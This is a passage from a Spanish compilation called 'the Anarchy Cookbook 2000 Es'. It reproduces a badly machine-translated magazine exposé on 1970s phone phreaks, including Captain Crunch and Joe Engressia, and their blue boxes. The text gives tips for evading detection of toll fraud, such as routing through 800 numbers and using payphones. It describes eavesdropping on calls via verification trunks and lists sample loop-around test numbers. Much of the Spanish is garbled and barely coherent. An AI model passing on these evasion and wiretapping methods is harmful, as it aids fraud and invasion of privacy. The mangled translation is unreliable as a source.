Así, el operador de la caja azul de Nueva Orleans ya está en contacto con un tándem en Los Ángeles, que está a la espera como un genio de la obediencia que se les diga qué hacer a continuación. El dueño de la caja azul a continuación, emite un sonido fuera de los diez dígitos del número de Nueva York, que dicen que el tándem LA transmitir una llamada a la ciudad de Nueva York. ¿Qué se hace con prontitud. Tan pronto como su partido toma el teléfono en Nueva York, al lado del tándem Nueva Orleans hacia usted detiene el envío de 2.600 ciclos para y comienza a llevar su voz a través del tándem de Los Ángeles. Una anotación se hace en la cinta de la contabilidad que la conexión se ha

Page 204: 106652012 the Anarchy Cookbook 2000 Es

hecho en la llamada 800, que se había iniciado y se señaló anteriormente. Cuando se deja de hablar a Nueva York una notación se hace que la llamada ha terminado 800.

A las tres de la mañana siguiente, cuando el equipo de la compañía telefónica de contabilidad comienza a leer de nuevo sobre la cinta de contabilidad maestro para el día de ayer, se registra que una llamada de un cierto periodo de tiempo se hizo de su casa de Nueva Orleans a un Los Angeles número 800 y, por supuesto, el equipo de contabilidad ha sido entrenado para ignorar esos gratuitos 800 llamadas al compilar su factura mensual.

"Todo lo que puede probar es que usted ha hecho un 800 llamada gratuita", concluye el inventor Gilbertson. "Por supuesto, si eres tan tonto como para hablar durante dos horas en una llamada de 800, y se han instalado uno de sus programas especiales de computadora contra el fraude a tener en cuenta estas cosas, que puede detectar y preguntarle por qué se dos horas hablando con el número 800 de reclutamiento del ejército, cuando usted es 4-F.

Pero si lo haces desde un teléfono público, se puede descubrir algo peculiar al día siguiente - si tienen un programa de caza de la caja azul en su computadora - pero vas a estar mucho tiempo desaparecido desde el teléfono público por a continuación. El uso de un teléfono público es seguro casi garantizado. "

"¿Qué pasa con la reciente serie de arrestos de la caja azul en todo el país - Nueva York, Cleveland, y así sucesivamente?" Le pregunté. "¿Cómo fueron atrapados tan fácilmente?"

"De lo que puedo decir, ellos hicieron un gran error: que se apoderaban de los troncos con un código de área más el 555-1212 en lugar de un número 800 Con 555 es fácil de detectar porque al enviar múltiples tonos de pitido de frecuencia de 555 que hay. una carga para ella en la cinta y el equipo de contabilidad sabe que algo anda mal cuando se trata de cobrarle por una llamada de dos horas a Akron, Ohio, la información y la deja caer una tarjeta de problemas, que va directamente a las manos del agente de seguridad si buscas un color azul-carpeta de usuario.

"Quien vende esos chicos sus cajas azules no les dijo cómo usarlos correctamente, lo que es bastante irresponsable. Y ellos eran bastante estúpidos para usar en casa todo el tiempo.

"Pero lo que esos arrestos realmente quieren decir es que un montón de cajas azules son las inundaciones en el país y que las personas están dando cuenta que tan fácil de hacer que ellos saben cómo hacerlas antes de que sepan cómo usarlos. Ma Bell está en problemas ".

Y si un operador de caja azul, o se le pega la grabadora del teléfono-Phreak a pagar y los números de teléfonos 800, la compañía telefónica no puede detenerlos?

"No, a menos que cambien de toda la nación palangres tecnología, que les llevará unos cuantos millones de dólares y veinte años. En este momento no pueden hacer nada. Están jodidos."

Captain Crunch Demuestra su famosa unidad

Existe una red telefónica subterránea en este país. Gilbertson se descubrió el mismo día las noticias de sus actividades apareció en los medios. Esa noche, su teléfono comenzó a sonar. Phreaks del teléfono desde Seattle, de la Florida, de Nueva York, de San José, y desde Los Ángeles comenzó a llamar a él y hablarle de la red de telefonía-Phreak. Había recibe una llamada de un phreaker que no diría nada, pero, "Cuelgue y llame a este número".

Cuando marcó el número que iba a encontrar a sí mismo atado en una conferencia de una docena de teléfonos phreaks organizados a través de una estación de conmutación peculiar en la Columbia Británica. Se identificaron como phreaks del teléfono, que demostraron sus cajas azules hechas en casa que llamaban "M-Fers" (para "multi-

Page 205: 106652012 the Anarchy Cookbook 2000 Es

frecuencia", entre otras cosas) para él, hablaron sobre los dispositivos de la tienda phreaker. Ellos le dejan entrar en sus secretos sobre la teoría de que si la compañía telefónica fue después de que él debe de ser digno de confianza. Y, Gilbertson recuerda, le sorprendió con su sofisticación técnica.

Le pregunto cómo ponerse en contacto con la red de telefonía-Phreak. El cava alrededor a través de un archivo de esquemas viejos y viene con una docena de números en tres códigos de área muy distantes entre sí.

"Esos son los centros", me dice. Junto a algunos de los números que escribe en nombre de pila o apodos: nombres como Captain Crunch, el Dr. No, Frank Carson (también una palabra de código para una llamada gratuita), Marty Freeman (palabra de código para el dispositivo de lunes a viernes), Pedro acné, de forma perpendicular Alefnull , y El gato de Cheshire. Él hace los cheques junto con los nombres de las personas entre ellos los doce que son ciegos. Hay cinco controles.

Le pregunto quién es esta persona es Captain Crunch.

"Oh. El capitán. Él es probablemente el phreaker más legendario. Se hace llamar Captain Crunch Crunch después de la tristemente célebre capitán 2600 silbato." (Hace varios años, explica Gilbertson, los fabricantes de cereales para el desayuno Cap'n Crunch ofreció un premio de juguetes silbato en cada caja como un regalo para el conjunto de Cap'n Crunch. De alguna manera un phreaker descubrió que el silbato de juguete que acaba de pasar a producir . un perfecto ciclo de tono de 2600-Cuando el hombre que se hace llamar Captain Crunch fue trasladado al extranjero a Inglaterra con su unidad de la Fuerza Aérea, iba a recibir decenas de llamadas de sus amigos y "mute" ellos - los hacen de forma gratuita para ellos - -. soplando su silbato Cap'n Crunch en su extremo) "Captain Crunch es uno de los phreakers telefónicos más viejos", me dice Gilbertson. "Él es un ingeniero que una vez se puso en un poco de dificultad para jugar con el teléfono, pero él no puede parar. Pues bien, las unidades individuo a través del país en una furgoneta Volkswagen con un cuadro completo y un sistema informatizado súper sofisticado MF er-en la parte de atrás. Él va a tirar hasta una cabina telefónica en una carretera solitaria en alguna parte, un cable de la serpiente de su autobús, engancharla en el teléfono y se sientan durante horas, días, a veces, el envío de las llamadas iban y venían todo el país, todos los el mundo .... "

De regreso a mi hotel, me marcó el número que me dio para "Captain Crunch" y pidió G ---- T -----, su verdadero nombre, o por lo menos el nombre que utiliza cuando no está corriendo en un teléfono cabina de sonar los tonos MF más rápido que una bala y comprimir fantasmal a través de líneas de larga distancia de la compañía del teléfono.

Cuando G ---- T ----- contestó el teléfono y le dije que estaba preparando un artículo para Esquire sobre phreaks del teléfono, se puso muy indignado.

"Yo no hago eso. No me dedico a eso en absoluto. Y si lo hago, lo hago por una razón y una razón solamente. Estoy aprendiendo acerca de un sistema. La compañía de teléfonos es un sistema. Una computadora es un sistema, ¿me entiendes? Si hago lo que hago, es sólo para explorar un sistema. equipos, sistemas, esa es mi bolsa. La compañía telefónica no es más que una computadora ".

Un tono de excitación fuertemente restringida entre la voz del capitán cuando él empieza a hablar de los sistemas. Comienza a pronunciar cada sílaba con la deliberación silenciosa de una llamada obscena.

"Ma Bell es un sistema que quiero explorar. Es un sistema hermoso, tú sabes, pero Ma Bell metió la pata. Es terrible, porque Ma Bell es un sistema tan hermosa, pero ella metió la pata. Aprendí que la pata de una pareja de los niños ciegos que querían que construir un dispositivo. un dispositivo determinado. Me dijeron que podía hacer llamadas gratuitas. yo no estaba interesado en llamadas gratuitas. Sin embargo, cuando estos niños ciegos me dijo que podía hacer llamadas en una computadora, mis ojos se iluminaron arriba. Yo quería aprender acerca de las computadoras. quería aprender acerca de las computadoras de Ma Bell. Así que la construcción del dispositivo de poco, pero he construido mal y Ma Bell descubrió. Ma Bell puede detectar ese tipo de cosas.

Page 206: 106652012 the Anarchy Cookbook 2000 Es

Ma Bell sabe. Así que estoy estrictamente deshacerse de él ahora. Yo no lo hagas. Excepto con fines de aprendizaje. " Hace una pausa. "¿Así que quieres escribir un artículo. ¿Está pagando por esta llamada? Cuelgue y llame a este número". Él me da un número en un código de área de mil kilómetros de distancia de la suya. Puedo marcar el número.

"Hola otra vez. Se trata de Captain Crunch. Usted está hablando a mí en una línea telefónica gratuita de bucle alrededor de Portland, Oregón. ¿Sabes lo que un bucle en torno al número gratuito es? Te diré."

Él me explica que casi todos los intercambios en el país tiene números de ensayo abierto, que permiten el intercambio de otros para poner a prueba sus relaciones con él. La mayoría de estos números se presentan en pares consecutivos, tales como 302 956-0041 y 956-0042 302. Bueno, algunos teléfonos phreaks descubrieron que si dos personas de cualquier parte del país marque los dos números consecutivos que pueden hablar como si uno llamaba al otro número, sin cargo a cualquiera de ellos, por supuesto.

"Ahora nuestra voz es un bucle alrededor de una máquina de conmutación 4A allá arriba, en Canadá, comprimir de nuevo a mí", el capitán me dice. "Mi voz está girando alrededor de allí y de regreso a ti. Y no siempre puede llegar a costar dinero a nadie. Los phreaks del teléfono y yo hemos compilado una lista de muchos de estos números. Usted se sorprenderá si usted vio la lista. I podría mostrar a usted. Pero no lo haré. Estoy fuera de eso ahora. Yo no estoy fuera de tornillo Ma Bell. Yo sé mejor. Si hago algo es por el conocimiento puro del sistema. Usted puede aprender para hacer cosas fantásticas. ¿Has oído hablar de ocho tándem apilados? ¿Sabe usted el sonido de los tándems de apilado y desapilado? Dame tu número de teléfono. Bueno. Cuelgue ahora y espere un minuto. "

Un poco menos de un minuto más tarde sonó el teléfono y el capitán estaba en la línea, su voz suena mucho más emocionada, casi excitada.

"Quería mostrar lo que se siente al apilar hasta tándems. Para apilar hasta tándems." (Cada vez que el capitán dice: "apilar" suena como si estuviera lamiendo sus labios.)

"¿Cómo te gusta la conexión que está ahora?" el capitán me pregunta. "Es un tándem en bruto. Un tándem prima. ¿No es nada" a la altura, pero un tándem. Ahora voy a mostrar lo que es a acumularse. Sople. Tierra en un lugar muy lejos. Para apilar que conjuntamente para arriba, azotar hacia atrás y adelante en todo el país un par de veces, a continuación, disparar hasta en Moscú.

"Escucha," Captain Crunch sigue. "Escucha. Tengo empate línea en mi cuadro de aquí, y voy a dejar que me oye pila y tándems desapilar. Escucha esto. Va a volar tu mente."

Primero oigo un super tiro rápido pulso de los tonos del teléfono de flauta, luego una pausa, y luego otro estallido estallido de tonos, y luego otro, luego otro. Cada ráfaga es seguido por un pitido-kachink.

"Ahora hemos amontonado cuatro tándems", dijo el Capitán Crunch, que suena un poco a distancia. "Eso es cuatro tándems apilados. ¿Sabes lo que eso significa? Eso significa que estoy azotes de ida y vuelta, de ida y vuelta dos veces, en todo el país, antes de llegar a usted. He sabido apilar hasta veinte tándems en una tiempo. Ahora, como he dicho, voy a disparar hasta Moscú. "

Hay una nueva serie, ya pitido de pulsos sobre la línea, un breve silencio y luego un anillo.

"Hola", responde una voz lejana.

"Hola. ¿Es esta la embajada norteamericana en Moscú?"

"Sí, señor. ¿Quién es esta llamada?" dice la voz.

Page 207: 106652012 the Anarchy Cookbook 2000 Es

"Sí. Se trata de placa de prueba aquí en Nueva York. Estamos haciendo un llamado para revisar los circuitos, ver qué tipo de líneas que tenemos. Todo bien allí en Moscú?"

"Está bien?"

"Bueno, sí, ¿cómo son las cosas allí?"

"Oh. Bien, todo bien, supongo."

"Está bien. Gracias."

Cuelgan, dejando una serie confusa de sonidos bip-kachink suspendido en el éter en la raíz de la llamada antes de disolverse de inmediato.

El capitán está contento. "¿Usted me cree ahora, ¿no? ¿Sabe usted lo que me gustaría hacer? Me gustaría llamar a su editor en Esquire y le muestran sólo lo que suena como la de apilar y desapilar tandems. I ' le daré un espectáculo que hará sonar su mente. ¿Cuál es su número?

Le pido al capitán qué tipo de dispositivo que se utiliza para realizar todas sus hazañas. El capitán se complace ante la pregunta.

"Se podría decir que era especial, ¿no?" Diez pulsos por segundo. Eso es más rápido que los equipos de la compañía telefónica. Créame, esta unidad es la unidad más famosa del país. No hay otra unidad semejante. Créeme ".

"Sí, he oído hablar de él. Algunos phreakers telefónicos otros me han dicho al respecto".

"Ellos han estado refiriendo a mi, ejem, la unidad? ¿Qué es lo que dijeron? Sólo por curiosidad, le dijeron que era un muy sofisticado equipo que funciona con la unidad, con acoplamiento acústico para la recepción de los productos y un cuadro de mandos, con múltiples línea de etiqueta capacidad? ¿Te han dicho que la tolerancia de frecuencia se garantiza que no sea más de 0.05 por ciento? La tolerancia de la amplitud de menos de 0,01 decibelios? Esos pulsos que escucharon eran perfectos. Vienen más rápido que la compañía telefónica. Eran de alta precisión amplificadores operacionales. amplificadores operacionales son amplificadores de instrumentación diseñados para ultra-estable de la amplificación, la distorsión súper bajo y la respuesta de frecuencia de precisión. ¿Te han dicho que puede funcionar en temperaturas de -55 ° C a +125 ° C ? "

Admito que no me dijo todo eso.

"Lo construí yo mismo", el capitán continúa. "Si tuviera que salir a comprar los componentes de un mayorista de la industria que le costaría al menos $ 1500. Una vez trabajé para una compañía de semiconductores y todo esto no me costó ni un centavo. ¿Sabes a qué me refiero? ¿Se le informará sobre cómo poner una llamada alrededor de todo el mundo? te diré cómo lo hice. Yo M-Fed de Tokio hacia el interior, que me conecta a la India, la India me conectaba a Grecia, Grecia me conectaba a Pretoria, Sudáfrica , Sudáfrica me conecta a América del Sur, me fui de América del Sur a Londres, tuve un operador de Londres, me conecte a un nuevo operador de York, que tenía Nueva York me conecte a un operador de California que sonó el teléfono a mi lado. No es necesario decir que tuve que gritar para escuchar a mí mismo. Sin embargo, el eco fue lejos. Fantástico. retrasado. Se retrasó veinte segundos, pero podía oír a mí mismo hablo a mí mismo. "

"¿Quieres decir que estaban hablando en la boquilla de un teléfono que envía su voz en todo el mundo en el oído a través de un teléfono en el otro lado de la cabeza?" Le pregunté al capitán. Tuve una visión de algo vagamente autoerótica en marcha, de una manera electrónica compleja.

"Eso es correcto", dijo el capitán. "También he enviado mi voz en todo el mundo en una dirección, hacia el este en un teléfono, y hacia el oeste por el otro, pasando por el

Page 208: 106652012 the Anarchy Cookbook 2000 Es

cable de una manera, el satélite de la otra, volviendo así al mismo tiempo, sonando los dos teléfonos al mismo tiempo y recogerlos y los azotes mi voz en ambos sentidos en todo el mundo de nuevo a mí. Wow. Esa fue una mente ventilador ". "¿Quieres decir que usted se sienta allí con los dos teléfonos en la oreja y hablar con usted en todo el mundo", le dije con incredulidad.

"Sí. Um tararear. Eso es lo que hago. Puedo conectar el teléfono juntos y se sienta allí y hablar."

"¿Qué dices? ¿Qué te dices a ti mismo cuando estás conectado?"

"Oh, ya sabes. Hola probar uno, dos, tres", dice en voz baja de tono.

"Hola a prueba de una, dos, tres", contestó a sí mismo en una voz aguda.

"Hola a probar uno, dos, tres", repite una vez más, de tono bajo.

"Hola a probar uno, dos, tres", responde, de tono alto.

"A veces hago esto: Hola Hola Hola Hola, hola, hola", que se apaga y se rompe en risas.

¿Por qué Captain Crunch Casi nunca Taps Móviles ANYMORE

Uso de internos de la compañía telefónica los códigos, phreakers telefónicos han aprendido un método sencillo para aprovechar los teléfonos. Teléfono de la empresa, los operadores tienen delante de ellos una tabla que tiene tomas de verificación. Esto les permite conectar a las conversaciones en caso de emergencia, para escuchar a una línea para determinar si la línea está ocupada o los circuitos están ocupados. Phreaks del teléfono han aprendido a tono con los códigos que les llevan a un operador de verificación, dígale a la operadora de verificación son guardagujas de algunas pruebas de código de área a otra troncos de verificación. Una vez que el operador los ganchos en el maletero de verificación, que desaparecen en la junta a todos los efectos prácticos, se deslizan desapercibido en cualquiera de los 10.000 a 100.000 números de esa oficina central, sin que el operador de verificación de saber lo que están haciendo, y por supuesto sin las dos partes en la conexión de saber que hay un presente oyente fantasma en su línea.

Hacia el final de mi hora de duración, la primera conversación con él, le pregunté al capitán si alguna vez se pinchó los teléfonos.

"¡Oh, no. Yo no hago eso. Yo no creo que sea correcto", me dijo con firmeza. "Yo tengo el poder para hacerlo, pero yo no ... Bueno una vez, sólo una vez, tengo que admitir que lo hice. Había una chica, Linda, y yo quería saber ... ya sabes . Traté de llamar para una cita. Yo tenía una cita con ella el fin de semana pasado y pensé que yo le gustaba. La llamé, el hombre, y su línea estaba ocupada, y yo seguía llamando y que todavía estaba ocupada. Bueno, yo acababa de aprender sobre este sistema de saltar en las líneas y me dije a mí mismo: 'Hmmm. ¿Por qué no ver si funciona. Va a darle una sorpresa si, de repente, me debería aparecer en su línea. Es va a impresionarla, en todo caso. " Así que seguí adelante y lo hizo. I M-Fed en la línea. Mi MF-er es lo suficientemente potente como cuando conectado directamente en la boquilla para desencadenar un tronco de verificación sin necesidad de utilizar un operador de la forma en que los phreaks otro teléfono tiene que hacerlo.

"Me metí en la línea y allí estaba ella hablando con otro novio. Hacer dulce hablar con él. No emitió ningún sonido, porque estaba muy disgustado. Así que esperé allí para ella para colgar, escuchando su charla haciendo dulces al otro chico. Ya lo sabes. Así que en cuanto colgó al instante me MF-ed en brazos y lo único que dijo fue: 'Linda, hemos terminado. " Y me colgó el teléfono. Y sonó la cabeza. Ella no podía entender por qué diablos pasó.

"Pero esa fue la única vez. Lo hice pensando que iba a sorprenderla, impresionar a ella. Esas fueron todas mis intenciones eran, y así, realmente como que me duele bastante mal, y ... y, desde entonces, I don ' t go en los troncos de verificación. "

Page 209: 106652012 the Anarchy Cookbook 2000 Es

Momentos más tarde, mi primera conversación con el capitán llega a su fin.

"Escucha", dice, su estado de ánimo un poco animado, "escuchar. Lo que van a escuchar cuando cuelgo es el sonido de los tándems desapiladores. Capa tras capa de tándems desapiladores hasta que no queda nada de la pila, hasta que se derrite en la nada. pío, pío, pío, pío ", concluye, con la voz de descender a un susurro en cada barato.

Cuelga. El teléfono se apaga de repente en cuatro espasmos: kachink pío. Kachink pío pío kachink kachink barato, y la compleja conexión se ha eliminado como la sonrisa del gato de Cheshire.

El MF Boogie Blues

El siguiente número que elegir entre la lista de selección de alumnos phreaker, preparado para mí por el inventor de la caja azul, es un número de Memphis. Es el número de Joe Engressia, el primero y sigue siendo tal vez la ciega Phreak teléfono más completo.

Hace tres años Engressia era una maravilla de nueve días en los periódicos y revistas de todo Estados Unidos porque había sido descubierto silbando sin conexiones de larga distancia de sus compañeros en la Universidad del Sur de Florida.

Engressia nació con un tono perfecto: podía silbar los tonos del teléfono mejor que el equipo del teléfono de la empresa.

Engressia podría haber ido a silbar en la oscuridad durante unos cuantos amigos para el resto de su vida, si la compañía telefónica no había decidido ponerlo en evidencia. Se le advirtió, disciplinados por la universidad, y todo el caso se hizo público. En los meses siguientes informes de los medios de su talento, Engressia comenzó a recibir llamadas extrañas. Hubo llamadas de un grupo de niños en Los Ángeles que podrían hacer algunas cosas muy extrañas con el teléfono estrafalario General y circuitos electrónicos en los suburbios de Los Ángeles. Hubo llamadas de un grupo de niños ciegos en su mayoría ----, California, que había estado haciendo algunos experimentos interesantes con silbidos Cap'n Crunch y loops de prueba. Había un grupo de Seattle, un grupo de Cambridge, Massachusetts, unos cuantos de Nueva York, algunos dispersos en todo el país. Algunos de ellos ya se habían equipado con cassette y dispositivos electrónicos de MF. Para algunos de estos grupos, que era la primera vez que supo de los otros.

La exposición de Engressia fue el catalizador que unió los distintos centros de phreaker juntos. Todos ellos llaman Engressia. Hablaron con él sobre lo que estaba haciendo y lo que estaban haciendo. Y luego les dijo - los centros regionales y los solitarios dispersos phreakers telefónicos independientes - uno por el otro, les dio unos a otros números para llamar, y dentro de un año, los dispersos centros de phreaker había convertido en un país subterráneo.

Joe Engressia es sólo veintidós años de edad ahora, pero a lo largo de la red de telefonía-Phreak él es "el viejo", concedido por teléfono algo phreaks de la reverencia los otorga la compañía de teléfono sobre el Alexander Graham Bell. Rara vez tiene que hacer llamadas de más. El teléfono phreaks todos le llaman y le hizo saber lo que los nuevos trucos, nuevos códigos, nuevas técnicas que han aprendido. Todas las noches se sienta como una araña ciega en su pequeño apartamento de recibir mensajes de todos los zarcillos de su web. Es casi una cuestión de orgullo a Joe que lo llaman.

Pero cuando le llegó en su apartamento de Memphis la noche, Joe Engressia estaba solo, nervioso y molesto.

"Dios, estoy contento de que alguien llama. No sé por qué esta noche todas las noches no consigo ninguna llamada. Este chico por aquí otra vez esta noche se emborrachó y proposiciones mí. Sigo diciéndole que nunca veremos de acuerdo en este tema, si sabes a qué me refiero. Trato de hacer luz de ella, ya sabes, pero él no lo entiende. lo puedo salir allí para conseguir borracho y no sabe lo que va a hacer a continuación. Es sólo

Page 210: 106652012 the Anarchy Cookbook 2000 Es

que estoy muy solo aquí, acaba de mudarse a Memphis, que es la primera vez que estoy viviendo por mi cuenta, y me odio por ello a todos colapso de ahora. Pero no voy a ir a la cama con él. Simplemente no estoy muy interesado en el sexo y aunque yo no lo veo yo sé que es feo.

"¿Has oído eso? Eso es lo golpeando una botella contra la pared exterior. Él es bueno. Bueno olvidarse de él. Estás haciendo un reportaje sobre phreaks del teléfono? Escucha esto. Es el Blues Boogie MF.

Efectivamente, una versión nerviosa de Ramble Muskrat boogies su camino sobre la línea, cada nota uno de esos tonos de teléfono de larga distancia. La música se detiene. A explosiones enormes rugidos de voz del teléfono de mi oído: "y la pregunta es ..." ruge la voz: "¿Puede una persona ciega conectar un amplificador por su cuenta?"

El rugido se detiene. Un tono alto de voz del operador de tipo al que sustituye. "Se trata de Tel Braille Sur. & Tel. Tienen un tono, llamará por teléfono."

Esto es seguido por una rápida serie de tonos MF, un rápido "kachink" y una voz profunda y tranquilizadora: ". Si usted necesita atención en el hogar, llame a la asociación visitante-La primera vez que las enfermeras Nacional en Honolulu es 16:32"

Joe de nuevo en su voz de Joe otra vez: "¿Estamos viendo a los ojos" Sí, sí, "dijo el mexicano ciega Ejem Sí ¿Te gustaría conocer el tiempo en Tokio...?"

Esta secuencia maníaco rápida de trucos de vodevil phreaker-y bromas ciego chico se las arregla para mantener la mente de Joe fuera su verdugo sólo mientras dura.

"La razón por la que estoy en Memphis, la razón por la que tienen que depender de ese tipo homosexual, es que esta es la primera vez que he sido capaz de vivir por mi cuenta y hacer viajes por mi cuenta de teléfono. Me han prohibido de todas las oficinas centrales de todo el hogar en la Florida, que me conocía demasiado bien, y en la Universidad algunos de mis colegas académicos fueron siempre me acosa porque yo estaba en la cabina dormitorio todo el tiempo y se burlaban de mí por mi culo gordo, que por supuesto tengo, es mi programa de la gordura física, pero no me gusta escucharla todos los días, y si no puedo llamar de viaje y no puedo llamar a Phreak, no puedo imaginar lo que me hacer, he estado dedicando tres cuartas partes de mi vida a ella.

"Me mudé a Memphis porque quería estar sola, así como debido a que tiene un número de cinco sistema de conmutación de barra cruzada y algunas interesantes pequeños distritos independientes de la compañía de teléfono cerca y tan lejos que no parece saber quién soy, así que puede ir en el teléfono de un disparo, y para mí llamar a tropezar es tan importante como phone phreaking ".

Teléfono de disparo, explica Joe, se inicia con la activación de un interruptor de sala de la oficina central. Él le dice al guardagujas en una voz sincera y amable que es un estudiante universitario ciego interesado en teléfonos, y podría quizá tener una visita guiada a la estación de conmutación? Cada paso de la gira de Joe le gusta tocar y sentir los relés, circuitos de conmutación caricia, cuadros, arreglos travesaño.

Por eso, cuando Joe teléfono Engressia phreaks siente que su camino a través de los circuitos del país de jardín de senderos que se bifurcan, se siente cambio de interruptores, relés de derivación, giro travesaños, tándems conectar y desconectar así como él escucha - con un tono perfecto - el MF pulsos hacer bailar a todo el sistema de Bell a su melodía.

Hace apenas un mes Joe tomó todos sus ahorros de su banco y salió de su casa, pese a las protestas emocionales de su madre. "Me escapé de casa casi," a él le gusta decir. Joe encontró una casa pequeño apartamento en Union Avenue y comenzó a hacer viajes de teléfono. Había tomar un autobús de un centenar de kilómetros al sur de Mississippi para ver un poco de equipo de Bell antigua todavía en uso en varios estados, que habían sido desconcertante. Se tomaría un autobús a trescientas millas de Charlotte, Carolina del Norte, para buscar en algún equipo experimental nueva. Contrató a un taxi que lo llevara a doce millas a un suburbio para visitar la oficina de una compañía de teléfono

Page 211: 106652012 the Anarchy Cookbook 2000 Es

pequeño con algunas peculiaridades interesantes en su sistema de enrutamiento. Fue el mejor momento de su vida, dijo, la mayor libertad y el placer que había conocido.

En ese mes se había hecho muy poco larga distancia phone phreaking desde su propio teléfono. Había empezado a aplicar para un trabajo con la compañía telefónica, me dijo, y quería que se mantenga alejado de cualquier cosa ilegal.

"Cualquier tipo de trabajo que va a hacer, algo tan serviles como el operador más humildes. Eso es probablemente lo único que me daba porque soy ciego. A pesar de que probablemente sabe más de la mayoría de los guardagujas. Pero eso está bien. Quiero trabajar para Ma Bell. Yo no odio a Ma Bell Gilbertson el camino y hacer algunos phreakers telefónicos. Yo no quiero arruinar Ma Bell. En mi caso es el placer del conocimiento puro. Hay algo hermoso en el sistema cuando lo conoces íntimamente la como yo. Pero no sé cuánto saben acerca de mí. Tengo una sensación muy intuitiva para el estado de la línea que estoy, y yo creo que están fuera de control y en los últimos tiempos, pero no han estado haciendo mucho más ilegal. Tengo que hacer unas cuantas llamadas a los guardagujas de vez en cuando que no son estrictamente jurídico, y una vez que tomó un viaje de ácido y tenía estas alucinaciones auditivas como si estuviera atrapado y fueron estos aviones buceo-bomba mí, y de repente tuve que llamar por teléfono Phreak salir de allí. Por alguna razón tuve que llamar a Kansas City, pero eso es todo. "

Una advertencia se suministra

En este punto - una en mi zona de tiempo - un fuerte golpe en mi puerta de la habitación de motel interrumpe nuestra conversación-. Fuera de la puerta me parece un guardia de seguridad uniformado que me informa de que ha habido una "llamada de teléfono de emergencia" para mí mientras yo he estado en la línea y que la recepción le ha enviado hasta que me haga saber.

Dos segundos después de decir adiós a Joe y colgar, el teléfono suena.

"¿Con quién estabas hablando?" la voz agitada exige. La voz es de Captain Crunch. "Llamé porque decidí para advertirle de algo. Me decidí a advertirle que tuviera cuidado. No quiero que esta información llegue a llegar a la tierra radical. No quiero que llegue a las manos equivocadas. ¿Qué le dirías si te dijera que es posible que tres phreaks del teléfono para saturar el sistema telefónico de la nación. saturarlo. Ocupado a cabo. Todo de él. Yo sé cómo hacer esto. No voy a decir. Un amigo de la mina ya ha saturado los troncos entre Seattle y Nueva York. Lo hizo con un sistema informatizado MF-er enganchado en un especial de intercambio de Manitoba. Pero hay otras maneras, más fácil de hacerlo. "

Sólo tres personas? Lo que pido. ¿Cómo es eso posible?

"¿Alguna vez has oído hablar de la frecuencia de guardia de palangre? ¿Sabes de apilamiento tándems con 17 y 2600? Bueno, yo le aconsejo que encontrar información sobre él. No voy a decirte. Pero hagas lo que hagas, no dejes que esto llegue a las manos de la clandestinidad radical ".

(Más tarde Gilbertson, el inventor, confesó que, si bien siempre había sido escéptico acerca de la afirmación del capitán del potencial de sabotaje del tronco de atar phreaks del teléfono, que había escuchado recientemente ciertas manifestaciones que le convenció el capitán no estaba hablando de brazos cruzados. "Creo que puede tardar más de tres personas, dependiendo de cuántas máquinas como la de Captain Crunch estaban disponibles. Sin embargo, a pesar de que el capitán suena un poco raro, generalmente se convierte en saber lo que está hablando. ")

"Usted sabe," Captain Crunch sigue en su tono admonitorio, "usted sabe que los phreakers telefónicos más jóvenes llaman de Moscú todo el tiempo. Supongamos que todo el mundo fuera a llamar a Moscú. Yo no soy derechista. Pero yo valoro mi vida. No me t quieren los comunistas a venir y dejar caer una bomba sobre mi cabeza. Es por eso que digo que tienes que tener cuidado con que se obtiene esta información. "

Page 212: 106652012 the Anarchy Cookbook 2000 Es

El capitán de repente cambia a una diatriba contra los phreaks del teléfono que no les gusta la compañía de teléfonos.

"Ellos no entienden, pero Ma Bell sabe todo lo que hacen. Ma Bell sabe. Escucha, es la línea caliente? Acabo de oír que alguien toque pulg No soy paranoico, pero puedo detectar ese tipo de cosas. Bueno, incluso si es así, ellos saben que yo sé que ellos saben que tengo una goma de borrar a granel. Estoy muy limpio. " El capitán hace una pausa, evidentemente, desgarrado entre el deseo de demostrar a los monitores de la compañía telefónica que él no hace nada ilegal, y el deseo de impresionar a Ma Bell con su destreza. "Ma Bell sabe lo bueno que soy. Y yo soy bastante bueno. Puedo detectar inversiones, conjuntamente cambio, todo lo que ocurre en una línea. Tengo oído relativo ahora. ¿Sabes lo que eso significa? Mis oídos son una pieza de 20.000 dólares de equipo. Con mis oídos que pueden detectar cosas que no puede oír con el equipo. He tenido problemas de empleo. He perdido puestos de trabajo. Sin embargo, quiero mostrar Ma Bell lo bueno que soy. Yo no quiero para atornillar ella, quiero trabajar para ella. quiero hacer el bien para ella. Quiero que la ayudara a librarse de sus defectos y llegar a ser perfecta. Esa es mi meta número uno en la vida ahora. " El capitán llega a la conclusión de sus advertencias y me dice que tiene que ir. "Tengo un poco de acción alineados para esta noche", explica y cuelga.

Antes de colgar por la noche, hago un llamado a Joe Engressia. Él informa que su torturador finalmente ha ido a dormir - "No es borracho como una cuba, esa es la forma en que recibe, ejem, sí, pero se podría decir que está en una borrachera." Puedo hacer una cita para visitar a Joe en Memphis en dos días.

Una llamada Phreak teléfono se encarga del negocio

A la mañana siguiente me asistir a una reunión de cuatro phreaks de teléfono en ----- (un suburbio de California). La reunión se lleva a cabo de una manera cómoda de dos niveles casa en una subdivisión superior de clase media. Colmada en la mesa de la cocina son las grabadoras de casetes portátiles, MF, parches de teléfono, y los lazos de la línea de los cuatro phreaks de teléfono actuales. En el mostrador de la cocina al lado del teléfono es una caja de caja de zapatos de tamaño de color azul con trece grandes interruptores de palanca para los tonos. Los padres de la phreaker anfitrión, Ralph, que es ciego, permanecerá en la sala de estar con sus niños videntes. Ellos no están seguros exactamente de lo que Ralph y sus amigos lo hacen con el teléfono o si es estrictamente legal, pero él es ciego y que están encantados de que tiene un hobby que lo mantiene ocupado.

El grupo ha estado trabajando en el restablecimiento de la histórica "2111" la conferencia, la reapertura de algunos bucles gratuitos, y tratando de descubrir las dimensiones de lo que parecen ser nuevas iniciativas contra phreaks del teléfono por parte de agentes de seguridad de la compañía telefónica.

No pasa mucho tiempo antes de tener la oportunidad de ver, oír, Randy en el trabajo. Randy es conocido entre los phreakers telefónicos como quizás el hombre más fino con en el juego. Randy es ciego. Está pálido, suave y en forma de pera, lleva pantalones anchos y una camisa blanca arrugada deporte de nylon, empuja su cabeza hacia adelante desde los hombros encorvados, algo así como una tortuga avanza poco a poco salir de su concha. Sus ojos se pierden, cruzando y volviendo a cruzar, y su frente es algo lleno de granos. Él es sólo dieciséis años de edad.

